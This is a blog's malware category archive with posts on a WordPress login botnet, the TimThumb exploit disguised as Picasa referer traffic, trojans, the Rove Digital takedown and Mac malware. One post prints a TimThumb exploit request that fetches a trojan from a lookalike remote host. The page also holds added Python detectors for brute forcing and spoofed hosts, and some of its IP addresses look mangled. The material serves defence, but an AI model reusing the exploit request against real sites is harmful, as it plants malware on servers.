Category Archives: Malware
Malware, Trojans, Virus, Internet Security
Massive Number of Hacked USA Websites Participate in WordPress Botnet Attack
For the past couple of days we’ve been watching a customer’s WordPress site being attacked by a botnet of websites trying to access the site admin with the user name “admin” and a variety of simple passwords.
Most of these attacks are coming from USA based web hosting services. One particular top level service provider, Provo Unified Layer, stands out above the rest as the most hacked network. Many 2nd tier providers use Provo Unified Layer infrastructure including Bluehost and Hostmonster. Of the hosts using Provo Unified Layer infrastructure, Bluehost is ahead of the pack in having hosted sites participating in the botnet. (Read more about Bluehost and the Botnet).
Googlebot Error with WPOnlineStore Plugin
Googlebot triggers a PHP fatal error (‘function.require’) that causes the bot to receive a “500” internal server error when trying to crawl the pages created by the WordPress WPOnlineStore plugin. In my previous post I mentioned this ongoing problem. Today I can provide some additional information.
The problem is not unique to my shop site, although initial searches of the internet found only a few references to it. For the past two days the hosting company’s server engineers have been looking into the problem, unfortunately without any success. After disabling the Apache mod_secure settings, which appeared to be causing the error, Googlebot still triggered it. As previously mentioned in Googlebot has Problems with WPOnlineStore, it is only Googlebot that triggers the error – and therein lies the first clue.
Microsoft Security Essentials Under Microscope
A look at Microsoft Security Essentials, the free anti-virus application from Microsoft. Is Microsoft Security Essentials any good? Will it protect a Windows PC from most common threats? Can MSE compete with commercial security applications?
Over the next few months we will see.
Annoyed with Commercial AV Software.
I have become increasingly annoyed with commercial anti-virus applications. They have become overpriced, use too many system resources, interfere with other applications, or slow down internet access. Worse still, none of the apps are able to detect every virus or malware… An example is Trojan Generic 24, which seems to be detected only by AVG (which doesn’t stop or remove it). Trend Micro Titanium and Norton AV don’t find all versions of this dangerous trojan.
Hackers Using Picasa Spoof for Web Malware
Strange-looking referer URLs and GET requests that appear to be from Picasa are being used by hackers to find website vulnerabilities to inject malware or spam. Examining the details of the referer reveals something like this example: /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.jcibuenos*****.com.ar/2.php (stars replace the actual characters in the string for your safety; the link leads nowhere). This particular example will inject malware using the WordPress TimThumb exploit. The file 2.php contains a trojan horse!
Picasa is of course picasa.google.com, but the similarity can lead the unwary to disregard the source. These strings are typically long, similar in appearance to a Google search request string. Any URL containing this odd string (or similar) should be regarded as extremely suspicious, and the IP should at least be checked for known bad behaviour and blocked from accessing the website. The string is often seen along with WordPress TimThumb exploit attempts.
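The spoof works because the lookalike host begins with a trusted name (picasa.com.) but is registered under a different domain. The check below, an added example that is not code from the original post, classifies a request path the way a defender’s log filter or a hardened resizer should: a remote src host is accepted only if it equals, or is a subdomain of, an allowlisted name, and a host that merely starts with a listed name is flagged as a lookalike. The allowlist is a constructed one for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed allowlist for this example: hosts a TimThumb-style resizer may fetch from.
ALLOWED_HOSTS = ("picasa.com", "picasa.google.com", "blogger.com")
RESIZER_SCRIPTS = ("thumb.php", "timthumb.php")


def host_is_allowed(host: str) -> bool:
    """Exact or parent-domain match only; 'picasa.com.example.net' is rejected."""
    host = host.lower().rstrip(".")
    return any(host == a or host.endswith("." + a) for a in ALLOWED_HOSTS)


def classify_request(path_and_query: str) -> str:
    """Classify one request path: 'ok', 'remote-allowed', 'remote-unlisted' or 'lookalike'."""
    parts = urlsplit(path_and_query)
    script = parts.path.rsplit("/", 1)[-1].lower()
    if script not in RESIZER_SCRIPTS:
        return "ok"                      # not a resizer request, nothing to check
    src = parse_qs(parts.query).get("src", [""])[0]
    src_parts = urlsplit(src)
    if not src_parts.scheme:
        return "ok"                      # local image path, no remote fetch involved
    host = (src_parts.hostname or "").lower()
    if host_is_allowed(host):
        return "remote-allowed"
    # A listed name used as the leading labels of an unlisted host is the spoof pattern
    # described in the post (picasa.com.<other domain>); anything else is just unlisted.
    if any(host.startswith(a + ".") for a in ALLOWED_HOSTS):
        return "lookalike"
    return "remote-unlisted"


def suspicious(path_and_query: str) -> bool:
    """True for the request shapes that warrant checking and blocking the source IP."""
    return classify_request(path_and_query) in ("lookalike", "remote-unlisted")
```

Both 'lookalike' and 'remote-unlisted' results are the cases the post describes as extremely suspicious; 'remote-allowed' still deserves rate limiting, since a resizer fetching remote files is itself a risk.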
Home Grown Malware?
It looks like Trojan tvwjfm.exe (with several other names too – list of known names and further information) could have originated from South Africa. At least the first reported infections came from this locale.
This makes a change to the norm where the largest percentage of new malware hails from the Asian Sub-Continent, although a tie-in to this region cannot be excluded.
This Trojan has not had a big impact; outbreaks so far seem to be limited, possibly deliberately targeting specific users. However, the few reported instances should not be taken to imply this Trojan is not dangerous – it is.
The file is unusually large for a Trojan, containing a package of other files. If run, it behaves like an application installer. Even if the install is cancelled, the Trojan installs other malware unknown to the PC user.
I have decided to unofficially name this Trojan (as yet it has no official name) the Soccer Trojan. It presents itself with an icon of a soccer ball superimposed over a PC display, similar to the image on the left, which is clearly an attempt to encourage followers of this ball game to run the file.
Hopefully the Soccer Trojan will remain obscure, and not spread. Our vigilance is required at this early stage to interdict the malware before it gets the opportunity to ‘go viral’ and escape into the wild.
Cyber-Criminals Arrested, US Offices Closed
A cyber criminal network operated by Estonian company Rove Digital was taken down on November 8 2011 in a combined effort involving the FBI (Federal Bureau of Investigation of the USA) and the Estonian Police in co-operation with Trend Micro.
Rove Digital operated a botnet consisting of over four million (4 000 000) bots on computers infected with a class of malware known as ‘DNSChangers’. The infected systems typically have their DNS server settings changed to point to foreign IP addresses.
Rove Digital appears on the surface to be a legitimate business, with established offices in Tartu, Estonia. It is the parent company of several other operations, including Esthost, Estdomains, Cernel, UkrTelegroup and many less well-known shell companies.
Rove Digital used a variety of criminal methods to earn money from the DNS changers. The cyber crime network had operated since 2006.
Operation Ghost Click
Hacking Attempt from IP 188.8.131.52/8
An unsuccessful attempt to hack my website graphicline.co.za was made Friday 21 October 2011 shortly before 15h00 SAST (13h00 GMT).
The attempt was first identified by repeated 404 ‘page not found’ and 403 ‘access forbidden’ messages resulting from the hacker requesting URLs while trying to get access to the server and website setup files, and to log in to unauthorised and prohibited areas of the website and server. The server is set to send me notifications of 404, 403 and similar errors.
The attack originated from a business on the corner of Jumeirah Road and Sheikh Rashid Road, Jumeirah, Dubai, United Arab Emirates. The business is located in a warehouse or freight depot. The location was identified from the IP addresses used during the attack, 184.108.40.206 and 220.127.116.11. It appears two hackers were working simultaneously.
I should thank these ill-intentioned persons for testing the security of the website and server. Each incident is an opportunity to examine security and to improve the strength of the server environment.
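Both the “admin” password-guessing botnet described in the first post above and the 403/404 probing described here show up in an ordinary web server access log as bursts from one client IP. The following added example (not the blog’s own tooling) parses combined-format log lines and raises an alert per IP for either pattern; the thresholds and the sample lines are constructed for illustration, using documentation IP ranges rather than the addresses from the posts.

```python
import re
from collections import defaultdict

# Apache/nginx combined log format: IP, identity, user, [time], "request", status, bytes, "referer", "agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
LOGIN_THRESHOLD = 5   # POSTs to wp-login.php from one IP before alerting (constructed value)
ERROR_THRESHOLD = 5   # 403/404 responses from one IP before alerting (constructed value)


def summarise(lines):
    """Per-IP counts of login POSTs and of 403/404 responses, with the probed paths."""
    stats = defaultdict(lambda: {"login_posts": 0, "errors": 0, "probed": []})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                          # skip lines not in combined format
        rec = stats[m["ip"]]
        path = m["path"].split("?", 1)[0]     # drop the query string
        if m["method"] == "POST" and path.endswith("/wp-login.php"):
            rec["login_posts"] += 1
        if m["status"] in ("403", "404"):
            rec["errors"] += 1
            rec["probed"].append(path)
    return stats


def alerts(lines):
    """Return {ip: reason} for IPs whose activity crosses either threshold."""
    out = {}
    for ip, rec in summarise(lines).items():
        if rec["login_posts"] >= LOGIN_THRESHOLD:
            out[ip] = f"{rec['login_posts']} POSTs to wp-login.php (possible password guessing)"
        elif rec["errors"] >= ERROR_THRESHOLD:
            probed = sorted(set(rec["probed"]))[:3]
            out[ip] = f"{rec['errors']} 403/404 responses while probing {probed}"
    return out


# Constructed sample log: six login POSTs from one IP, five 403/404 probes from another, one normal hit.
SAMPLE_LOG = (
    [f'203.0.113.10 - - [21/Oct/2011:14:5{i}:00 +0200] "POST /wp-login.php HTTP/1.1" 200 3456 "-" "Mozilla/5.0"'
     for i in range(6)]
    + [f'198.51.100.7 - - [21/Oct/2011:14:55:0{i} +0200] "GET /{p} HTTP/1.1" {s} 512 "-" "curl/7.21"'
       for i, (p, s) in enumerate([("setup/", 404), ("admin/", 403), ("config.bak", 403),
                                   ("install/", 404), ("backup/", 404)])]
    + ['192.0.2.5 - - [21/Oct/2011:14:56:00 +0200] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"']
)

if __name__ == "__main__":
    for ip, reason in alerts(SAMPLE_LOG).items():
        print(ip, reason)
```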
Article about Trojan Horse Generic24.cgol
I thought now would be a good time to post an update. The .cgol variety seems to have died down somewhat; however, it seems that every day a new version is detected. Recent references I found include:
- trojan generic 24 cjgk (also generic24.cjgk) (20 Sept 2011)
- trojan Generic24.BRQA
- trojan Generic24.BRQD
- trojan Generic24.BRQF etc (Full list at AVG)
- Trojan Horse generic24.TSU (21 Sept 2011)
- trojan Generic24.BUOM
- Generic24.BVUA (22 Sept 2011)
- trojan generic24 pnt (12 Sept 2011)
- GENERIC 24.CPQJ (23 Sept 2011)
- trojan-generic24-aawj (12 Sept 2011)
- Trojan horse Generic24.CAVY (21 Sept 2011)
- Generic24.BIVS (2 Sep 2011)
- Generic24.FLZ (05 Oct 2011)
- Trojan horse Generic24.PYB (01 Oct 2011)
- Generic24.ATJW (03 Sept 2011)
- Trojan horse Generic 24.WMQ (24 Sept 2011)
The list goes on; these are from recent forums and other articles found via a search engine, from Sept this year.
There are literally thousands of similar malware trojans with the name ‘generic’.
One common factor is that they are generally considered hacking malware, opening a backdoor to other viruses which capture personal information from the user of an infected PC.
Again I stress the importance of early intervention should one of these trojans infect your PC.
The removal tips at the above web address can be used to fix most early infections by looking for HKEY references similar to those mentioned for Firefox.
Apple Macs do get Malware
How often do we still hear Mac users blithely proclaiming they have no need for anti-virus software because Macs don’t get viruses? Well, Mac users, those days are gone for good, if they ever existed at all.
The fact that what some regard as the world’s first virus, “Elk Cloner”, was a Mac virus seems to have exited people’s minds.
The hardened Unix core of the Mac operating system perhaps makes it more difficult for malicious persons to write viruses and trojans for Macs. Also, in the old days Mac users were a very small group of computer users, mainly professionals involved in the print and graphics industries, not a big enough target for virus creators to spend their time on.
Mac users have been complacent, secure in the expectation that their systems are safe. At one time I was one of them; I used Macs for years with no AV software installed.
Recent Mac Viruses
These Mac Trojans are not however the end of the story. Consider all the file sharing between Mac and Windows users in the commercial world.
Macs can give Windows Malware
Here is an example:
User A prepares work on a Mac. User A has no Anti Virus software because Macs are immune! Unknown to user A, a visit to a website has installed a Windows virus or trojan in a Word or Excel file. User A sends the file to user B, a Windows user. User B’s PC gets infected!
Or another example:
User A gets an e-mail containing malware and forwards it to User B. Once again User B’s PC gets infected.
Mac users, break the malware chain and get your Macs protected. The days of Mac immunity to malware are gone forever.